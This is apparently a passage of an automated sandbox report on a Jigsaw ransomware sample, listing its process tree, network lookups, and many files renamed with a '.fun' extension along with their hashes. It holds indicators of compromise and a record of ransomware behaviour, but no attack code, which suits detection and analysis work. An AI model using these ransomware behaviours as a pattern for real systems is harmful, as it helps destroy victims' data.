PID 3548 wrote to memory of 1940 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3548 wrote to memory of 1940 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3548 wrote to memory of 1940 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3548 wrote to memory of 1940 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Processes

C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Jigsaw\jigsaw.exe

"C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Jigsaw\jigsaw.exe"

C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe

"C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe" C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Jigsaw\jigsaw.exe

C:\Windows\system32\taskmgr.exe

"C:\Windows\system32\taskmgr.exe" /4

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\Downloads\ShowConnect.mht

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0x120,0x124,0xfc,0x128,0x7ffb7ffc46f8,0x7ffb7ffc4708,0x7ffb7ffc4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2020,17103721558146777487,14580073802057630622,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2028 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2020,17103721558146777487,14580073802057630622,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2248 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2020,17103721558146777487,14580073802057630622,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2724 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,17103721558146777487,14580073802057630622,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3356 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,17103721558146777487,14580073802057630622,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3364 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost

C:\Windows\system32\NOTEPAD.EXE

"C:\Windows\system32\NOTEPAD.EXE" C:\vcredist2012_x86_0_vcRuntimeMinimum_x86.log

C:\Windows\system32\werfault.exe

werfault.exe /h /shared Global\b4b2597ca91442b88eea24723abaa22f /t 3068 /p 3428

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffb91f9ab58,0x7ffb91f9ab68,0x7ffb91f9ab78

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1724 --field-trial-handle=1844,i,18079249652616784200,2035754481317327268,131072 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2204 --field-trial-handle=1844,i,18079249652616784200,2035754481317327268,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2272 --field-trial-handle=1844,i,18079249652616784200,2035754481317327268,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3120 --field-trial-handle=1844,i,18079249652616784200,2035754481317327268,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3140 --field-trial-handle=1844,i,18079249652616784200,2035754481317327268,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4420 --field-trial-handle=1844,i,18079249652616784200,2035754481317327268,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4100 --field-trial-handle=1844,i,18079249652616784200,2035754481317327268,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4688 --field-trial-handle=1844,i,18079249652616784200,2035754481317327268,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3924 --field-trial-handle=1844,i,18079249652616784200,2035754481317327268,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1740 --field-trial-handle=1844,i,18079249652616784200,2035754481317327268,131072 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2204 --field-trial-handle=1844,i,18079249652616784200,2035754481317327268,131072 /prefetch:8

C:\Windows\system32\werfault.exe

werfault.exe /h /shared Global\e3ffa307a7d0471fa6045809606adf9c /t 180 /p 1768

C:\Windows\System32\spoolsv.exe

C:\Windows\System32\spoolsv.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\system32\NOTEPAD.EXE

"C:\Windows\system32\NOTEPAD.EXE" C:\vcredist2012_x86_0_vcRuntimeMinimum_x86.log

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 203.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 64.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 13.107.21.237:443 g.bing.com tcp
NL 23.62.61.97:443 www.bing.com tcp
US 8.8.8.8:53 237.21.107.13.in-addr.arpa udp
US 8.8.8.8:53 97.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 36.56.20.217.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
N/A 239.255.255.250:3702 udp
N/A 239.255.255.250:3702 udp
US 8.8.8.8:53 c.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.2.0.f.f.ip6.arpa udp
US 8.8.8.8:53 www.google.com udp
GB 142.250.187.196:443 www.google.com udp
GB 142.250.187.196:443 www.google.com tcp
US 8.8.8.8:53 3.200.250.142.in-addr.arpa udp
US 8.8.8.8:53 196.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 106.201.58.216.in-addr.arpa udp
US 8.8.8.8:53 apis.google.com udp
GB 142.250.200.14:443 apis.google.com udp
US 8.8.8.8:53 play.google.com udp
GB 142.250.179.238:443 play.google.com udp
GB 142.250.179.238:443 play.google.com tcp
US 8.8.8.8:53 14.200.250.142.in-addr.arpa udp
US 8.8.8.8:53 195.212.58.216.in-addr.arpa udp
US 8.8.8.8:53 238.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 16.173.189.20.in-addr.arpa udp
US 8.8.8.8:53 55.36.223.20.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 10.28.171.150.in-addr.arpa udp
US 8.8.8.8:53 164.189.21.2.in-addr.arpa udp

Files

memory/4028-0-0x00007FFB83275000-0x00007FFB83276000-memory.dmp

memory/4028-1-0x00007FFB82FC0000-0x00007FFB83961000-memory.dmp

memory/4028-2-0x0000000000F60000-0x0000000000F98000-memory.dmp

memory/4028-4-0x000000001BA70000-0x000000001BF3E000-memory.dmp

memory/4028-3-0x00007FFB82FC0000-0x00007FFB83961000-memory.dmp

memory/4028-5-0x000000001BF40000-0x000000001BFDC000-memory.dmp

C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe

MD5 2773e3dc59472296cb0024ba7715a64e
SHA1 27d99fbca067f478bb91cdbcb92f13a828b00859
SHA256 3ae96f73d805e1d3995253db4d910300d8442ea603737a1428b613061e7f61e7
SHA512 6ef530b209f8ec459cca66dbf2c31ec96c5f7d609f17fa3b877d276968032fbc6132ea4a45ed1450fb6c5d730a7c9349bf4481e28befaea6b119ec0ded842262

memory/4028-19-0x00007FFB82FC0000-0x00007FFB83961000-memory.dmp

memory/3428-20-0x00007FFB82FC0000-0x00007FFB83961000-memory.dmp

memory/3428-21-0x00007FFB82FC0000-0x00007FFB83961000-memory.dmp

memory/3428-22-0x00007FFB82FC0000-0x00007FFB83961000-memory.dmp

memory/3428-23-0x000000001B5B0000-0x000000001B5B8000-memory.dmp

memory/3428-254-0x00007FFB82FC0000-0x00007FFB83961000-memory.dmp

memory/3428-255-0x00007FFB82FC0000-0x00007FFB83961000-memory.dmp

memory/3428-256-0x00007FFB82FC0000-0x00007FFB83961000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\{5F535ACF-FADC-4643-A2F0-24045D70E4A2} - OProcSessId.dat.fun

MD5 8ebcc5ca5ac09a09376801ecdd6f3792
SHA1 81187142b138e0245d5d0bc511f7c46c30df3e14
SHA256 619e246fc0ac11320ff9e322a979948d949494b0c18217f4d794e1b398818880
SHA512 cec50bfc6ad2f57f16da99459f40f2d424c6d5691685fa1053284f46c8c8c8a975d7bcb1f3521c4f3fbdc310cf4714e29404aa23be6021e2e267c97b090dc650

C:\Program Files\Java\jdk-1.8\jre\lib\images\cursors\invalid32x32.gif.fun

MD5 580ee0344b7da2786da6a433a1e84893
SHA1 60f8c4dd5457e9834f5402cb326b1a2d3ca0ba7e
SHA256 98b6c2ddfefc628d03ceaef9d69688674a6bc32eb707f9ed86bc8c75675c4513
SHA512 356d2cdea3321e894b5b46ad1ea24c0e3c8be8e3c454b5bd300b7340cbb454e71fc89ca09ea0785b373b483e67c2f6f6bb408e489b0de4ff82d5ed69a75613ba

C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\LanguageNames2\DisplayLanguageNames.en_US_POSIX.txt.fun

MD5 829165ca0fd145de3c2c8051b321734f
SHA1 f5cc3af85ab27c3ea2c2f7cbb8295b28a76a459e
SHA256 a193ee2673e0ba5ebc5ea6e65665b8a28bd7611f06d2b0174ec2076e22d94356
SHA512 7d380cda12b342a770def9d4e9c078c97874f3a30cd9f531355e3744a8fef2308f79878ffeb12ce26953325cb6a17bc7e54237dfdc2ee72b140ec295676adbcb

C:\Users\Admin\AppData\Local\Packages\Microsoft.AccountsControl_cw5n1h2txyewy\Settings\settings.dat.fun

MD5 f22599af9343cac74a6c5412104d748c
SHA1 e2ac4c57fa38f9d99f3d38c2f6582b4334331df5
SHA256 36537e56d60910ab6aa548e64ca4adafdcabde9d60739013993e12ba061dfd65
SHA512 5c8afc025e1d8342d93b7842dc7ef22eca61085857a80a08ba9b3f156ee3b814606bb32bc244bd525a7913e7915bdf3a86771d39577f4a1176ade04dc381c6d4

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133626047950574231.txt.fun

MD5 c408fe54ebacb4f32d787b81ef224d39
SHA1 e3d2528a5ff4a52c9e2d9ab562a04a2c710da1c7
SHA256 99262dd9d9e4a7219143051937efbd2a98fe5db1d1e60dbfc2bc6601fc01efc8
SHA512 7556ab93b16b72f3c9d619b30e574b67f95a1983ed5dd05e63ef33b23893ab3768b4d139691b4fb36490c1d5170854bb954aa17adc8446eb204847caa20e0012

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133626052813607644.txt.fun

MD5 4f162a341c5623f4f9fb48bde1bd8687
SHA1 3c4f2000b4b73b9e32eb8bc28f2a9b50c06bfef9
SHA256 aaacfbd30fec8f67ef3119075b1ce9e81afc6b7ceffc6e9f55c5fa6fcd13ce46
SHA512 3b6d1146b4a75c5d4def3d80a2981baaaabf016580b0671b65195b555263a05139c2c79b15efa2cfcc24ce3aada0e1c643bec9ef0dc9a12aee454eeeeea8ead8

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133626055682919415.txt.fun

MD5 0c4039e2bc1d499f82cc957a90885637
SHA1 01ca3eedaf8d2ea5311722a37755285288b72fac
SHA256 c08e5c75b9dc71a283489dd7e3fd97b55fd5c7a8e1032d1b19ba780f693c39e3
SHA512 27fa753b784246affa1f4e911595503af53a422e5938b481649392c7d8efc1d3ccda19a45d0abad2027298b2dc1f7599dd0bed95c96c9fd05938a978e32d4b6a

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{fbf257de-6570-4630-902c-10acf3a7613b}\0.1.filtertrie.intermediate.txt.fun

MD5 1fd532d45d20d5c86da0196e1af3f59a
SHA1 34adcab9d06e04ea6771fa6c9612b445fe261fab
SHA256 dae6420ea1d7dbe55ab9d32b04270a2b7092a9b6645ed4e87ad2c2da5fdd6bae
SHA512 f778cd0256eda2c1d8724a46f82e18ab760221181f75649e49dd32e9a2558bec0e9c52c5306ad17b18ab60395d83c438742103fe9adddf808e40c3d8384ea0b0

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{fbf257de-6570-4630-902c-10acf3a7613b}\0.2.filtertrie.intermediate.txt.fun

MD5 f405f596786198c6260d9c5c2b057999
SHA1 f8f3345eb5abc30606964a460d8eef43d3304076
SHA256 58e3090edb9316d9141065ac654a08169f2833091e6eb3a53b5a774a61b7e30a
SHA512 a0b3573dae218ade265709a6fdee5f7700c9754eb10747de5af34af340ae95909d0a8902159a735e82eb5d7091f50a7997113661a7ec3fcc2b408fb6c78a4c39

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_remove_18.svg.fun

MD5 75a585c1b60bd6c75d496d3b042738d5
SHA1 02c310d7bf79b32a43acd367d031b6a88c7e95ed
SHA256 5ebbfc6df60e21044486a5df3cb47ccdcd7a4d5f197804555715ffd9bf6c5834
SHA512 663a302e651b9167f4c4e6ae30028307b4d8da0dda3a0e5fd414104951d50419862fc9396c5b39fe5c4b696efd3efbf0b575688983b1d341f3ef38becf500505

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\rhp_world_icon_2x.png.fun

MD5 409a8070b50ad164eda5691adf5a2345
SHA1 e84e10471f3775d5d706a3b7e361100c9fbfaf74
SHA256 a91790b778026db625c9dedfe1c6d94b884818b33d7977e86b2f9c2f3c500796
SHA512 767a75edd37d29b3433040ce21cda849cd11ba549f27581f7edc6416c433ba7047c56908d40956422393ab0f35ede61617d4bd2aad0bde3d1ebd276584c858c7

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\rhp_world_icon.png.fun

MD5 880833ad1399589728c877f0ebf9dce0
SHA1 0a98c8a78b48c4b1b4165a2c6b612084d9d26dce
SHA256 7a27d891097df183fbf0031e3894bdac0ce77aef15d666ddd9f6a04e9836fb27
SHA512 0ddf247892a72a390437390d535debf6e41d12e51b31eb4f0353b710ec380c5fbc531a48e76935088063a41aca843287d3def9c1cd46be05b8dcb69f5017a464

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\rhp_world_icon_hover.png.fun

MD5 2884524604c89632ebbf595e1d905df9
SHA1 b6053c85110b0364766e18daab579ac048b36545
SHA256 ae2facd997527426fc4def82e0db68be29b44499bfff86a28c36f7c31b177d4f
SHA512 0b506397627823a1768796129c6b37d146821471b89338b5f2d0fd3aea707fd46a8e197ee0e298ddfb3b50eef0a0b064946006346b060f733ef19cbd5d24fc90

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\rhp_world_icon_hover_2x.png.fun

MD5 e092d14d26938d98728ce4698ee49bc3
SHA1 9f8ee037664b4871ec02ed6bba11a5317b9e784a
SHA256 5e8ec278a273be22199884d519a79f748801baa3a45b76e57569fdfffe96e7fb
SHA512 b2fcb5d46339cdf6b5a954f2a083cf913779e57cb6e8699bc5da1fba1c370c41117b7ddefb50075622067eb7b02a20268bc047171bd883bcda4a497c2ec64ea4

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\generic-rhp-app\images\example_icons.png.fun

MD5 65368c6dd915332ad36d061e55d02d6f
SHA1 fb4bc0862b192ad322fcb8215a33bd06c4077c6b
SHA256 6f9c7ebec5a707de439e3fd2e278fdfa07a39465d56157b70b24f091509bf76f
SHA512 8bb9a7690aeb3c0b9e14e1a6ebc5741536d354cf2324fd74ee0c3e4ef511718f7795039a94c8d2df94b6e6d0fb1762191cb649089d1def12abdf34003f0cdd0f

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\generic-rhp-app\images\example_icons2x.png.fun

MD5 0d35b2591dc256d3575b38c748338021
SHA1 313f42a267f483e16e9dd223202c6679f243f02d
SHA256 1ca0cfc2df0354c8d886285ae5e743d9c7cc030e1afd68ac113c0f2ce43ad5fa
SHA512 f6c58c27bbde7508a866bd0e7fabadb13a4f020378cd8b8cfc0c9fa23f645d811d6cdea04b81afdf30c064c6248152e74b3e6a78ec7a3d1d19037a0db8897d7e

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\ui-strings.js.fun

MD5 433755fcc2552446eb1345dd28c924eb
SHA1 23863f5257bdc268015f31ab22434728e5982019
SHA256 d6c290e942ee665d71e288229423a1f1866842988eac01f886910b0ec383aa9b
SHA512 de83b580ce27012a7677e1da867c91e2a42dbc6b5872dcf756ace51c2862801814665ecca997171f2e550e8b9a3de19994d2516a4e5d4d57e16c7b4b823236c0

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\ui-strings.js.fun

MD5 781ed8cdd7186821383d43d770d2e357
SHA1 99638b49b4cfec881688b025467df9f6f15371e8
SHA256 a955039cd9e53674395f4b758218e4d59c89e99a0c4d2a909e49f6008b8f5dd4
SHA512 87cb9c4288586df232200f7bbacee3dee04f31c9444902dd369ad5c392d71e9837ebf8b3bb0fcb4a5db8a879cf757e97ce248939e3316c6bf3a3fe7cbe579534

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\images\themes\dark\icons.png.fun

MD5 72269cd78515bde3812a44fa4c1c028c
SHA1 87cada599a01acf0a43692f07a58f62f5d90d22c
SHA256 7c78b3da50c1135a9e1ecace9aea4ea7ac8622d2a87b952fc917c81010c953f7
SHA512 3834b7a8866e8656bbdbf711fc400956e9b7a14e192758f26ccf31d8f6ab8e34f7b1983c1845dc84e45ff70555e423d54a475f6a668511d3bcbdd1d460eeb4b0

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\images\themes\dark\icons_ie8.gif.fun

MD5 eda4add7a17cc3d53920dd85d5987a5f
SHA1 863dcc28a16e16f66f607790807299b4578e6319
SHA256 97f6348eaa48800e603d11fa22c62e10682ad919e7af2b2e59d6bd53937618f2
SHA512 d59fa9648dc7cb76a5163014f91b6d65d33aaa86fc9d9c73bf147943a3254b4c4f77f06b2e95bb8f94246a982ea466eb33dac9573dd62f40953fd23de1c1b498

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\images\themes\dark\icons_retina.png.fun

MD5 7dbb12df8a1a7faae12a7df93b48a7aa
SHA1 07800ce598bee0825598ad6f5513e2ba60d56645
SHA256 aecde4eb94a19095495d76ef3189a9abd45bcfd41acbed7705d22b4c7d00aa77
SHA512 96e454ebb4c96573e8edc6822290c22d425f4c7f7adbab35e6dc4b3ce04a5916ae9254c2c312c98299835ecbf3c5aa95da2939b8408ac25fbae44ba87a3795dc

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\images\themes\dark\new_icons.png.fun

MD5 82a2e835674d50f1a9388aaf1b935002
SHA1 e09d0577da42a15ec1b71a887ff3e48cfbfeff1a
SHA256 904372666ca3c40f92b20317d92ca531678958affbc34591401e338146fe0ecb
SHA512 b10a8e384d0bd088443a5085f5c22a296f6f4d295a053d4526690ba65846e887daec47d01cf18fdf1160db98061a8b7c4040de56e6e604451a821fadccf32698

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\images\themes\dark\new_icons_retina.png.fun

MD5 150c9a9ed69b12d54ada958fcdbb1d8a
SHA1 804c540a51a8d14c6019d3886ece68f32f1631d5
SHA256 2dee41184747742fbdc527b2023d67fecec1ccdfdf258439a06cd75d4fd33f43
SHA512 70193ee6f0919eb14311f43b5a5da041deacb568db55fc43290ee76e17af902ac468435b37a150630ea3b7871c724073915ae5dcba3c301ac42f2d68dd598e2f

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\themes\dark\rhp_world_icon_2x.png.fun

MD5 be26a499465cfbb09a281f34012eada0
SHA1 b8544b9f569724a863e85209f81cd952acdea561
SHA256 9095e9b4759e823e96984981af41b7a9915a5ecaa6be769f89c13484cef9e0f5
SHA512 28196e5de9670e9f63adcf648368bd3ea5926a03e28a13adc2fb69c567fba2f84e4f162637c487acb64eda2e30993f849806f2313820ba693c7e70303542d04f

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\themes\dark\rhp_world_icon.png.fun

MD5 0c680b0b1e428ebc7bff87da2553d512
SHA1 f801dedfc3796d7ec52ee8ba85f26f24bbd2627c
SHA256 9433084e61062d2b709c1390e298ddaf3fb0226656662c04c0b7026a44dee750
SHA512 2d1399a6bf225b048d2b12656e941ad912636acae2dec387f92f33ac80629a1e504bca63580ba73a8ed073788f697274d5eb76ea1b089f0555fd397a8f5cbbff

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\themes\dark\rhp_world_icon_hover_2x.png.fun

MD5 ad091690b979144c795c59933373ea3f
SHA1 5d9e481bc96e6f53b6ff148b0da8417f63962ada
SHA256 7805ac9d0e05d560023e5aabed960d842e4f3ec2aa3db45a9cfb541688e2edb1
SHA512 23b4c799a7b25f70962e8dd0ec7286ba7150053cab7c88f5fb1efc1095c2987bd6f3572e7fb3ee4b2238958e52a763de2c84a74615df7a6d3a19a034584fd687

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\themes\dark\rhp_world_icon_hover.png.fun

MD5 2de4e157bf747db92c978efce8754951
SHA1 c8d31effbb9621aefac55cf3d4ecf8db5e77f53d
SHA256 341976b4fe312824d02512d74770a6df9e1c37123781655532bd9cd97ea65fa9
SHA512 3042a742c38434ae3ee4fe10f7137462cdebad5cae0f9a85fb61063d15a30e1b54ac878b1af65f699c6ca1a9d2c3e58d245e54bdebfadc460cbd060836734e11

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\themes\dark\bg_patterns_header.png.fun

MD5 6e333be79ea4454e2ae4a0649edc420d
SHA1 95a545127e10daea20fd38b29dcc66029bd3b8bc
SHA256 112f72ef2bc57de697b82b731775fba3f518d1ae072120cd11b732bf4a782e36
